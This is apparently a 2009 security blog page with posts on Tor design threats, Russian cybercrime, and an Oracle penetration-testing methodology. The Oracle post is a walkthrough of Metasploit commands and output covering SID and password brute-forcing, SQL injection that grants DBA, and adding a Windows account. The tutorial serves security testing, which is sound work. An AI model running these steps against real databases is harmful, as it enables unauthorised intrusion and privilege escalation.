Saturday, September 26, 2009

Security Threats in Tor Design

The Tor Project is one of the open-source solutions available to protect privacy and security over the network communication. There are currently 1500 active relays supported and 300,000+ active users world-wide. The basic definition of 'anonimity' is interpreted differently by different set of users. For instance, home users refer it as a privacy solution/anti-censorship, commercial sector call it a network security mechanism and the Government institutions take it as a traffic-analysis resistance.

Consider a simple relay architecture as below, in which each user hide its anonimity behind single proxy host.


Now, you can imagine that single relay could turn to be eavesdropper or single point of failure in communication. So, joining multiple relay-gates can add stability and anonimity in communication.

In this joint-relay conversation over the network, a corrupted node (RelayHost D) can identify that 'Shawn' is talking but never know to whom. Similarly, another node (RelayHost G) can tell that somebody is talking to 'Rosi' but don't know who. Thus, the integrity of privacy is secured, however, visualizing a typical Tor network design (Centralized Directory Protocol) can reveal
other set of threats.


Practical Security Problems

1. Tor hides your identity/location but never encrypt 'COMPLETE' set of network traffic, thus, vulnerable to eavesdropping attack on the internet.
2. Communication on ports like 23, 110, 109 etc should be refused by Tor?
3. Active attack on web cookies (e.g. Gmail Account) are still handy.
4. Before creating new Tor node, you need to be verified by central authority? Does it really exist?
5. What if your node is running anti-virus protection program on the top of win32 platform to detect malicious traffic? What will be the consequences?
6. What if you are relaying through the China node and its ISP is hijacking sessions using SSL MiTM attack.
7. No more than 2 inter-routing relays on one IP address is feasible?
8. Is it really secure to use Tor application directly from USB leaving no traces? How about WINDOWS/Prefetch folder and Registry entries?
9. Problems where communication take place from Tor to Non-Tor node and backward.
10. Abnormal use of proxy settings by the application can result in privacy exposure.
11. Clogging and congestion attacks.


Some Security Measures

1. Filter the connections by blocking unwanted directory authorities.
2. Filter unwanted relay IP addresses.
3. Prevent users from finding the Tor service running on your machine.
4. Cap on filtering based on Tor's network fingerprint.
5. Consider adaptive padding to the traffic.
6. Use higher level of encryption as possible (i.e. AES 256).
7. Integrate efficient algorithm for allocating connections safely to Tor circuit.

Sunday, September 13, 2009

Russian Cyberspace: A daylight in the dark world

Due to rapid increase in number of internet users and technology, the magnitude of threat-ratio is also multiplying every year. Cyber crime in today's fast moving world is considered as a potential business. FBI recorded and reported a loss of $265 million during the annual year of 2008. However, these does not cover other billions USD loss counted towards other parts of the world. Due to unfair nature of national and international cyber law enforcement structure and joint efforts of overseas government may result in serious problems between two or more countries.


Loss reported always become a part of "strategic revenue recovery plan" for the organizations by imposing higher prices on current products or by increasing the service charges for new or existing customers. Today's cyber crime is highly organized, transitional and very secretive with major criminal groups operating from more than 30 countries. The trend of cybercrime has emerged during the late 1990s to early 2000s in eastern Europe (i.e Republic of Soviet Union and other countries). Due to the presence of injustice and lack of law and order, the highly educated and technologically powered segments of population in Russia conduct sophisticated criminal activities to make their living. Apart from financial motivation, these criminals successfully suppress ethical anxiety and fear of stealing someone else entire life savings
by hiding their identity and forwarding the national justifications.

Statements like:
"They deserve what they are getting after what they've done to us"
"We are taking back what's rightfully ours"
are really common in online forums based in Eastern Europe. The highlights of which can be seen below:

In October 2004, FBI run a joint operation with Secret Service and USPIS called "Operation Firewall" which resulted in several arrests and termination of online criminal portals, "ShadowCrew" and "CarderPlanet". Other successful operations have also come forward, such as "Operation Cardkeeper" and "DarkMarket" in 2006 targeting the US and Western European criminals, concluded in October 2008 with 60 consecutive arrests. This fear has brought significant changes to the underground community such that many have left this illegal business and took their careers in different directions and those who remain intact gone underground.

Thursday, September 10, 2009

Oracle Security Assessment: The Open Source Approach

For the couple of years, number of Oracle vulnerabilities and exploits have been discovered in no order of standard methodology or appropriate guidelines. Moreover, there is no publicly available PenTesting Framework to check in-built packages for input validation attacks resulting in privilege escalation and data extraction. In this article, I will present the Oracle Pentesting Methodology in seven unique steps.

1. Discovery
Port Scanning for Oracle services can be done by using a simple Nmap tool. Oracle default ports are different for different products. But the main "Oracle TNS Listener" will always be using the range of 1521-1540 unless not changed.
For more information on ports used by Oracle, please visit:
http://www.red-database-security.com/whitepaper/oracle_default_ports.html

bt#: nmap -sV 192.168.0.100-105 -p 1521
Starting Nmap 4.85BETA8 ( http://nmap.org ) at 2009-06-18 15:25 EDT
Interesting ports on 192.168.0.100:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener
Interesting ports on 192.168.0.101:
PORT STATE SERVICE VERSION
1521/tcp open oracle-tns Oracle TNS Listener 9.2.0.1.0 (for 32-bit Windows)

2. Version Enumeration/Fingerprinting
In order to know the exact version of "TNS Listener", we will use Metasploit auxiliary:
msf auxiliary(tnslsnr_version) > info
Name: Oracle tnslsnr Service Version Query.
Version: 6479
License: Metasploit Framework License (BSD)
Provided by: CG
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
RPORT 1521 yes The target port
THREADS 1 yes The number of concurrent threads

Description:
This module simply queries the tnslsnr service for the Oracle build.

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.100
RHOSTS => 192.168.0.100
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.100 is running: 32-bit Windows: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.102
RHOSTS => 192.168.0.102
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.102 is running: Solaris: Version 10.2.0.1.0 - Production

msf auxiliary(tnslsnr_version) > set RHOSTS 192.168.0.103
RHOSTS => 192.168.0.103
msf auxiliary(tnslsnr_version) > run
[*] Host 192.168.0.103 is running: Linux: Version 11.1.0.6.0 - Production
[*] Auxiliary module execution completed

Now if we want to enumerate the "Oracle SID" for newer versions after 9.2.0.8, we have to put guess or bruteforce it.

[*] Host 192.168.0.105 is running: 32-bit Windows: Version 9.2.0.1.0 – Production
msf > use auxiliary/scanner/oracle/sid_enum
msf auxiliary(sid_enum) set RHOSTS 192.168.0.105
RHOSTS => 192.168.0.105
msf auxiliary(sid_enum) > run
[*] Identified SID for 192.168.0.105: PLSExtProc
[*] Identified SID for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: PLSExtProc
[*] Identified SERVICE_NAME for 192.168.0.105: cyxt
[*] Identified SERVICE_NAME for 192.168.0.105: cyxtXDB
[*] Auxiliary module execution completed

Bruteforce Method

msf auxiliary(sid_brute) > run
[*] Starting brute force on 192.168.0.103, using sids
from /home/bt/msf3/dev/data/exploits/sid.txt...
[*] Found SID 'ORCL' for host 192.168.0.103
[*] Auxiliary module execution completed

Apart from guessing and bruteforcing, we can also use different Oracle components to determine the SID. Such as, oracle servlets and web applications.


3. Bruteforce Attack
Using a standard or extended password list, one can bruteforce various combinations of usernames and passwords.
msf auxiliary(brute_login) > run

[-] ORA-01017: invalid username/password; logon denied
[-] ORA-01017: invalid username/password; logon denied
[*] Auxiliary module execution completed
msf auxiliary(brute_login) > db_notes
[*] Time: Sat May 30 08:44:09 -0500 2009 Note: host=172.10.1.109
type=BRUTEFORCED_ACCOUNT data=SCOTT/TIGER


4. Injection Attack & Privilege Exploitation

msf > use auxiliary/sqli/oracle/dbms_export_extension
msf auxiliary(dbms_export_extension) > info
Name: SQL Injection via DBMS_EXPORT_EXTENSION.
Version: $Revision:$
Provided by: MC
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SQL GRANT DBA TO SCOTT yes no SQL to run.
DBPASS TIGER yes The password to authenticate as.
DBUSER SCOTT yes The username to authenticate as.
RHOST 127.0.0.1 yes The Oracle host.
RPORT 1521 yes The TNS port.
SID DEMO yes The sid to authenticate with.

Description:
This module will escalate a Oracle DB user to DBA by exploiting an
sql injection bug in the DBMS_EXPORT_EXTENSION package.

msf auxiliary(dbms_export_extension) > set RHOST 192.168.100.25
RHOST => 192.168.100.25
msf auxiliary(dbms_export_extension) > set SID UNLUCKY
SID => UNLUCKY
msf auxiliary(dbms_export_extension) > run

[*] Sending package...
[*] Done...
[*] Sending body...
[*] Done...
[*] Sending declare...
[*] Done...
[*] Auxiliary module execution completed
msf auxiliary(dbms_export_extension) >

msf auxiliary(oracle_sql) > set SQL select * from user_role_privs
SQL => select * from user_role_privs
msf auxiliary(oracle_sql) > run
[*] Sending SQL...
[*] SCOTT,CONNECT,NO,YES,NO
[*]SCOTT,DBA,NO,YES,NO<--New Privileges :-) [*] SCOTT,RESOURCE,NO,YES,NO [*] Done... [*] Auxiliary module execution completed msf auxiliary(oracle_sql) >


5. Post Exploitation

msf auxiliary(win32exec) > set CMD "net user dba P@ssW0rd /add“
CMD => net user dba P@ssW0rd1234 /add
msf auxiliary(win32exec) > run
[*] Creating MSF JAVA class...
[*] Done...
[*] Creating MSF procedure...
[*] Done...
[*] Sending command: 'net user dba P@ssW0rd /add‘
[*] Done...
[*] Auxiliary module execution completed

These set of steps give us a clear view of exploiting the Oracle infrastucture following similar or other modified Penetration Testing methodology. Thus, it is quite important for security professionals to understand and correlate the ideal testing methods to derive the requirements for Oracle platform security.